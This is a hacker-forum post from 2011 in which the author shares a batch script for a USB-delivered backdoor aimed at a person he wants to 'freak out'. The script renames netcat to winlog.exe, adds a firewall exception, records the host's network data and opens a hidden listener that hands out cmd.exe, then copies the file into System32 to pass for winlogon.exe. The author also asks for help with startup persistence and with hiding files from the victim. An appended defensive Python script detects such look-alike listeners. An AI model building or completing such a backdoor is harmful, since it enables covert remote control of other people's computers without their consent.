A bit o' mischief ;)
Posted: Sat Nov 12, 2011 2:38 pm
Well, I was browsing through Liidian's post (http://www.hacker.org/forum/viewtopic.php?t=2379) and I thought it would be fun to freak someone out with it... a retard that thinks he knows about computers when he can't program his way out of a paper bag. So I came up with a bit of a "trojan", which isn't actually mine (the code is from netcat's tutorials), but I modified it a bit.
As you have surely guessed, winlog.exe is nc.exe renamed.
Legal stuff: This is for education / curiosity reasons ONLY. If you use it for illegal activities you are on your own and no one but you is responsible.
My mods are to actually get nc to run in the background, and even bypass the Windows firewall if run from an admin shell.
I also extract the PC data to connect to it at my leisure (the concept is simple: plug in the USB memory stick, execute the file, unplug, leave) and copy it to System32, because regular users rarely ever touch this folder and the renamed file looks totally legitimate there, alongside winlogon.exe, which BTW is a Windows essential procedure and can't be terminated. Also, System32 is by default in the command path, along with the Windows directory, so I can execute it from everywhere on the PC. You get where I am going?
What this misses is the simple fact that I have to make it run every time the user starts the PC. I know that the obvious choice is the Startup folder, but it is located in the user's personal folder, hence the problem: Is there any scripting adept out there who can enlighten me with the proper %what-should-I-put-here% thing, so I can just do:
copy StartEveryTime.bat %whatever%\startup ?
Also, I need another command to change the folder settings to NOT show hidden files. That way he/she won't ever take notice.
For now I have to do both of the aforementioned actions manually. So today I ask the help from any mischievous script guru and enthusiast.
Code:
@echo off
cls
rem Add a firewall exception for the renamed netcat (needs an admin shell)
netsh firewall add allowedprogram winlog.exe winlog ENABLE
rem Record the host's network configuration for connecting back later
ipconfig /all > data.txt
rem Detached listener on TCP 48888 that hands the connection to cmd.exe
start winlog.exe -d -l -p 48888 -e cmd.exe
rem Park a copy next to winlogon.exe; System32 is on the PATH
copy winlog.exe C:\WINDOWS\System32
exit
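The flip side of the post, as an added example that is not part of the original thread: a small offline triage script that parses saved `netstat -ano` and `tasklist /fo csv` output and flags exactly the artefact the batch file above leaves behind, a TCP listener owned by a process whose image name imitates a core Windows binary (winlog.exe next to winlogon.exe). The sample outputs are constructed for the example; only the port 48888 and the winlog.exe name come from the post. The CORE_BINARIES and EXPECTED_LISTENERS sets are assumptions for an XP-era workstation and should be adjusted to the host being checked.

```python
"""Offline triage of `netstat -ano` and `tasklist /fo csv` output.

Added example, not code from the post. It finds listening TCP sockets whose
owning process has an image name that imitates a core Windows binary, or
that is simply not an expected listener on the host.
"""
import csv
import io
import re
from dataclasses import dataclass

# Binaries an attacker is likely to imitate (assumed list; extend as needed).
CORE_BINARIES = {"winlogon.exe", "svchost.exe", "lsass.exe", "csrss.exe",
                 "services.exe", "explorer.exe", "spoolsv.exe"}

# Processes that legitimately listen on a default workstation (assumed list).
EXPECTED_LISTENERS = {"System", "svchost.exe", "lsass.exe", "alg.exe"}

# One `netstat -ano` row in LISTENING state: local addr, port, and owning PID.
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


@dataclass(frozen=True)
class Finding:
    port: int
    pid: int
    image: str
    reason: str


def parse_netstat(text):
    """Return [(local_addr, port, pid)] for every TCP LISTENING line."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return rows


def parse_tasklist_csv(text):
    """Map PID -> image name from `tasklist /fo csv` output (header included)."""
    reader = csv.reader(io.StringIO(text))
    next(reader)  # "Image Name","PID","Session Name","Session#","Mem Usage"
    return {int(row[1]): row[0] for row in reader if row}


def edit_distance(a, b):
    """Levenshtein distance; small distances to a core name are suspicious."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(image):
    """Return the core binary `image` imitates, or None.

    Case-insensitive; a name that shares the first three letters with a core
    binary and is within three edits of it (but not equal) counts.
    """
    name = image.lower()
    for core in CORE_BINARIES:
        if name != core and name[:3] == core[:3] and edit_distance(name, core) <= 3:
            return core
    return None


def triage(netstat_text, tasklist_text):
    """Correlate listeners with their owning process and flag the odd ones."""
    images = parse_tasklist_csv(tasklist_text)
    findings = []
    for _addr, port, pid in parse_netstat(netstat_text):
        image = images.get(pid, "<unknown pid>")
        core = lookalike_of(image)
        if core:
            findings.append(Finding(port, pid, image, f"image name imitates {core}"))
        elif image not in EXPECTED_LISTENERS:
            findings.append(Finding(port, pid, image, "listener not in expected set"))
    return findings


# Constructed sample output; port 48888 / winlog.exe mirror the post's script.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       1032
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:48888          0.0.0.0:0              LISTENING       2212
  TCP    192.168.1.20:139       0.0.0.0:0              LISTENING       4
  TCP    192.168.1.20:1043      192.168.1.1:80         ESTABLISHED     1588
"""

TASKLIST_SAMPLE = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Console","0","236 K"
"winlogon.exe","668","Console","0","3,940 K"
"svchost.exe","1032","Console","0","4,988 K"
"explorer.exe","1588","Console","0","18,320 K"
"winlog.exe","2212","Console","0","2,104 K"
"""

if __name__ == "__main__":
    for f in triage(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"port {f.port}  pid {f.pid}  {f.image}: {f.reason}")
```

On the sample data the only hit is the 48888 listener owned by winlog.exe, reported as imitating winlogon.exe; the 135/445/139 listeners owned by svchost.exe and System are left alone. The name-distance check is deliberately loose, so on a real host review the hits rather than acting on them blindly.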